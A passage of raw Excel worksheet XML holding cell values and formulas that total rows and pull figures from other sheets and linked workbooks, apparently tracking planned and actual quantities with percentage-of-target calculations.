      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'7'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'7'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]8'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]8'!$X$74</f>
        <v>215.6</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]8'!$Y$74</f>
        <v>222.285944084066</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]8'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]8'!$U$74</f>
        <v>5.20833333333333</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]8'!$V$74</f>
        <v>6.96795808966862</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]8'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]8'!$R$74</f>
        <v>10</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]8'!$S$74</f>
        <v>571.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'7'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'7'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]8'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]8'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]8'!$Y$72</f>
        <v>9.11174785100287e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]8'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]8'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]8'!$V$72</f>
        <v>4.25194931773879e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]8'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]8'!$R$72</f>
        <v>8e-6</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]8'!$S$72</f>
        <v>0.000349</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'7'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'7'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]8'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]8'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]8'!$Y$73</f>
        <v>239.299857738835</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]8'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]8'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]8'!$V$73</f>
        <v>70.4401845638402</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]8'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]8'!$R$73</f>
        <v>8e-6</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]8'!$S$73</f>
        <v>5781.730349</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]8'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]8'!$E$22</f>
        <v>6342</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'7'!H21</f>
        <v>58137</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2167575</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]8'!$I$22</f>
        <v>8023.76</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'7'!K21</f>
        <v>62343.4</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2128797.4</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]8'!$L$22</f>
        <v>78846.91</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>167.759382978723</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]8'!$W$81</f>
        <v>283.125</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]8'!$X$81</f>
        <v>284.83798948874</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]8'!$Y$81</f>
        <v>275.981818358927</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]8'!$T$81</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]8'!$U$81</f>
        <v>51.2842881944444</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]8'!$V$81</f>
        <v>36.4794001786875</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]8'!$Q$81</f>
        <v>8</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]8'!$R$81</f>
        <v>98.4658333333333</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]8'!$S$81</f>
        <v>2994.22916666667</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]8'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]8'!$E$17</f>
        <v>6406</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'7'!H22</f>
        <v>52187</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2083168</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]8'!$I$17</f>
        <v>6299.52</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'7'!K22</f>
        <v>55231.01</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1946692.39</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]8'!$L$17</f>
        <v>186922.342</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>93.461171</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]8'!$W$79</f>
        <v>89.4244302328453</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]8'!$X$79</f>
        <v>97.6339867824226</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]8'!$Y$79</f>
        <v>102.13665278047</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]8'!$T$79</f>
        <v>46.8738425925926</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]8'!$U$79</f>
        <v>51.9265046296296</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]8'!$V$79</f>
        <v>45.5318930041152</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]8'!$Q$79</f>
        <v>11.2497222222222</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]8'!$R$79</f>
        <v>99.6988888888889</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]8'!$S$79</f>
        <v>3737.25777777778</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]8'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]8'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'7'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]8'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'7'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]8'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]8'!$W$80</f>
        <v>91.6617414123265</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]8'!$X$80</f>
        <v>81.255659882751</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]8'!$Y$80</f>
        <v>79.2011511784455</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]8'!$T$80</f>
        <v>48.9571759259259</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]8'!$U$80</f>
        <v>48.5671296296296</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]8'!$V$80</f>
        <v>32.8716462259043</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]8'!$Q$80</f>
        <v>11.7497222222222</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]8'!$R$80</f>
        <v>93.2488888888889</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]8'!$S$80</f>
        <v>2698.10472222222</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]8'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]8'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'7'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]8'!$I$56</f>
        <v>2096.52</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'7'!K24</f>
        <v>13493.23</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>293319.76</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]8'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]8'!$R$6</f>
        <v>93</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]8'!$S$6</f>
        <v>85.1934156378601</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]8'!$T$6</f>
        <v>86.1336787612793</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]8'!$O$6</f>
        <v>70.8333333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]8'!$P$6</f>
        <v>63.28125</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]8'!$Q$6</f>
        <v>52.5757797270955</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]8'!$L$6</f>
        <v>17</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]8'!$M$6</f>
        <v>121.5</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]8'!$N$6</f>
        <v>4315.42</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]8'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'7'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]8'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'7'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]8'!$R$7</f>
        <v>206.704225352113</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]8'!$S$7</f>
        <v>205.222797927461</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]8'!$T$7</f>
        <v>187.984938384299</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]8'!$O$7</f>
        <v>73.9583333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]8'!$P$7</f>
        <v>50.2604166666667</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]8'!$Q$7</f>
        <v>50.1837231968811</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]8'!$L$7</f>
        <v>17.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]8'!$M$7</f>
        <v>96.5</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]8'!$N$7</f>
        <v>4119.08</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'7'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'7'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]8'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]8'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]8'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]8'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]8'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]8'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]8'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]8'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]8'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'7'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'7'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]8'!$W$69</f>
        <v>24.011609158336</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]8'!$X$69</f>
        <v>23.1961775831177</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]8'!$Y$69</f>
        <v>25.3387923041439</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]8'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]8'!$U$69</f>
        <v>50.1666666666667</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]8'!$V$69</f>
        <v>67.948343079922</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]8'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]8'!$R$69</f>
        <v>96.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]8'!$S$69</f>
        <v>5577.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'7'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'7'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]8'!$W$104</f>
        <v>28.4733062753614</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]8'!$X$104</f>
        <v>28.3288941690453</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]8'!$Y$104</f>
        <v>26.0325234787226</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]8'!$T$104</f>
        <v>100</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]8'!$U$104</f>
        <v>100</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]8'!$V$104</f>
        <v>65.2052875243665</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]8'!$Q$104</f>
        <v>24</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]8'!$R$104</f>
        <v>192</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]8'!$S$104</f>
        <v>5352.05</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'7'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'7'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]8'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]8'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]8'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]8'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]8'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]8'!$V$105</f>
        <v>34.1640107212476</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]8'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]8'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]8'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'7'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'7'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]8'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]8'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]8'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]8'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]8'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]8'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]8'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]8'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]8'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]8'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]8'!$E$16</f>
        <v>5568</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'7'!H31</f>
        <v>31322</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1404329</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]8'!$I$16</f>
        <v>4624.68</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'7'!K31</f>
        <v>40217.93</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1396266.06</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]8'!$L$16</f>
        <v>56533.44</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>75.37792</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'[11]8'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]8'!$E$13</f>
        <v>6202</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'7'!H32</f>
        <v>27294</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1555137</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]8'!$I$13</f>
        <v>4120</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'7'!K32</f>
        <v>23640</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1045118</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]8'!$L$13</f>
        <v>63424.616</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>126.849232</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]8'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]8'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]8'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]8'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]8'!$U$76</f>
        <v>3.64583333333333e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]8'!$V$76</f>
        <v>4.10575048732944e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]8'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]8'!$R$76</f>
        <v>7e-11</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]8'!$S$76</f>
        <v>3.37e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]8'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'7'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]8'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'7'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]8'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]8'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]8'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]8'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]8'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]8'!$U$77</f>
        <v>5.20833333333333e-12</v>
